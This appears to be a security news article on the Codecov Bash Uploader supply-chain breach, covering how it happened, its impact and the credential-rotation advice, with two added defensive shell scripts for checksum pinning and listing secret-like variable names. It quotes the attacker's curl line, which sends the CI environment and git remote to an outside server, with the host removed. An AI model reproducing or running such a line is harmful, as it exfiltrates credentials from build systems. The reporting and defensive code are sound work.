
How Codecov Hackers Compromised Hundreds of Networks through Supply Chain Attack

by CISOCONNECT Bureau

More information has become available about the recent Codecov breach, which may have affected a large number of projects. Read on to learn more.

Security response teams are struggling to assess the impact of a software supply chain breach of Codecov's Bash Uploader that had gone undetected since January and exposed confidential secrets such as tokens, keys, and credentials belonging to organisations all over the world.

The supply chain attack comes just two weeks after another significant incident affecting the popular PHP language repository, in which two malicious commits containing backdoors were injected into its source code.

In a note acknowledging the seriousness of the breach, Codecov said the compromise began four months ago but was only discovered in the wild by a Codecov customer on April 1, 2021.

“On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script,” Codecov said.

Technical Observations
Since January of this year, a malicious change to a shell script had gone undetected at code coverage reporting provider Codecov, raising concerns of yet another major supply chain attack. According to forensic analysis, an unknown threat actor exploited a flaw in Codecov's Docker container image build process to obtain the credential that allowed the company's Bash Uploader script to be modified.

According to Codecov, a Google Cloud Storage key was accessed on January 31 this year and was not secured until April 1 US time. The script was modified to send the contents of the UNIX shell environment, in which CI systems store variables such as credentials, to a third party instead of uploading coverage reports to Codecov.

The attacker changed one line of the Bash Uploader script to the following (the destination host has been removed from the published version):

curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:///upload/v2 || true

According to Codecov, the modified script could have submitted any passwords, tokens, or keys passed through customers' continuous integration runners. Codecov said these could in turn expose services, data stores, and application code reachable with those passwords, tokens, or keys.

The git remote URL of the origin repository from which coverage reports were uploaded could also have been accessed. The data was sent to a server hosted by Digital Ocean, a cloud infrastructure provider.

According to security experts, the hack may have affected a significant number of critical software projects. Other Codecov integrations that wrap the Bash Uploader, and are therefore also affected, include codecov-action for GitHub, the Codecov CircleCI Orb, and the Codecov Bitrise Step.

The self-hosted version of Codecov is unlikely to be affected unless users' CI pipelines are configured to retrieve the Bash Uploader.
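The modification stayed unnoticed for months because pipelines fetched and executed the script without checking that it was the script they expected. As an added example (not Codecov's code, and not advice quoted from Codecov on this page), the following POSIX shell script pins a downloaded helper script to a SHA-256 digest obtained out of band and refuses to run it on a mismatch. The function names, the sample files and the pinned digest are this example's own constructions.

```shell
#!/bin/sh
# Added example, not Codecov's code: refuse to run a downloaded CI helper
# script unless its SHA-256 digest matches a value pinned from an
# out-of-band source. Function names and sample files are this example's own.

# Print the SHA-256 hex digest of a file (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d ' ' -f 1
    else
        shasum -a 256 "$1" | cut -d ' ' -f 1
    fi
}

# Return 0 when the file's digest equals the expected digest, 1 otherwise.
verify_script() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# Execute the script only after it verifies; otherwise report and return 1.
run_if_verified() {
    if verify_script "$1" "$2"; then
        sh "$1"
    else
        echo "refusing to run $1: SHA-256 digest does not match pinned value" >&2
        return 1
    fi
}

# Build constructed fixtures in a temporary directory: the expected uploader
# script and a tampered copy with one extra line appended. Prints the directory.
make_demo_files() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho "uploading coverage report"\n' > "$dir/uploader.sh"
    cp "$dir/uploader.sh" "$dir/tampered.sh"
    printf 'echo "extra command added after publication"\n' >> "$dir/tampered.sh"
    echo "$dir"
}

# Demo. In a real pipeline PINNED_SHA256 is a literal pasted from the digest
# the script's publisher announced, never computed from the download itself;
# here it is derived from the constructed "good" file purely as a placeholder.
demo_dir=$(make_demo_files)
PINNED_SHA256=$(sha256_of "$demo_dir/uploader.sh")
run_if_verified "$demo_dir/uploader.sh" "$PINNED_SHA256"          # runs
run_if_verified "$demo_dir/tampered.sh" "$PINNED_SHA256" || true  # refused
rm -rf "$demo_dir"
```

A pinned digest only helps if it comes from somewhere the attacker cannot also rewrite; publishing it next to the script on the same server defeats the purpose, so keep it in the pipeline definition or in a separately controlled location and update it deliberately when a new script version is released.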

Damage Control
Codecov advises users to immediately invalidate all passwords, tokens, or keys stored in their CI environment variables and generate new ones.

Running the env command within the CI pipeline shows what is stored in the environment.
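Reading raw env output is error-prone on a busy runner, and pasting it into a ticket would spread the very values that need rotating. As an added example (not Codecov's code), the POSIX shell script below reads env-style NAME=value lines and prints only the names that look like credentials, producing a rotation checklist without ever echoing a value. The name pattern and the sample environment are constructed for this example.

```shell
#!/bin/sh
# Added example, not Codecov's code: list the NAMES of environment variables
# that look like credentials, so a team knows what to rotate after a CI
# runner's environment may have been exfiltrated. Values are never printed.
# The name pattern and the sample environment below are constructed.

# Name fragments that usually indicate a secret; extend for local conventions.
SECRET_NAME_PATTERN='TOKEN|SECRET|PASSWORD|PASSWD|API_KEY|ACCESS_KEY|PRIVATE_KEY|CREDENTIAL'

# Read NAME=value lines on stdin (the format env prints) and emit only the
# matching names, one per line, de-duplicated and sorted.
secret_like_names() {
    cut -d '=' -f 1 | grep -E -i "$SECRET_NAME_PATTERN" | sort -u
}

# Number of matching names on stdin.
count_secret_like() {
    secret_like_names | wc -l | tr -d ' '
}

# Constructed sample of what env might print on a CI runner (no real credentials).
SAMPLE_ENV='PATH=/usr/bin:/bin
CI=true
HOME=/home/runner
AWS_ACCESS_KEY_ID=example-key-id
AWS_SECRET_ACCESS_KEY=example-secret
GITHUB_TOKEN=example-token
NPM_TOKEN=example-token
DB_PASSWORD=example-password
LANG=C.UTF-8'

echo "Environment variables to rotate (names only):"
printf '%s\n' "$SAMPLE_ENV" | secret_like_names
# On a live runner, replace the sample with:  env | secret_like_names
```

A name-based filter is a starting point, not a guarantee: a secret held in a variable with an innocuous name (or one written to a file the script could read) will not be listed, so treat every value a compromised script could have reached as exposed and use the list to make sure nothing obvious is forgotten.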

Codecov says it has rotated all relevant credentials, including the key the attackers obtained, and has set up monitoring and auditing to ensure the Bash Uploader is not compromised again.

The incident has also been reported to US federal law enforcement, and the attackers' web server is to be properly decommissioned and preserved for audit so that further details can be gleaned from it.

More than 29,000 businesses, according to the company, use its code coverage insights to verify code consistency and maintain code coverage. Codecov did not state how many customers were affected or whose data was compromised as a result of the breach.
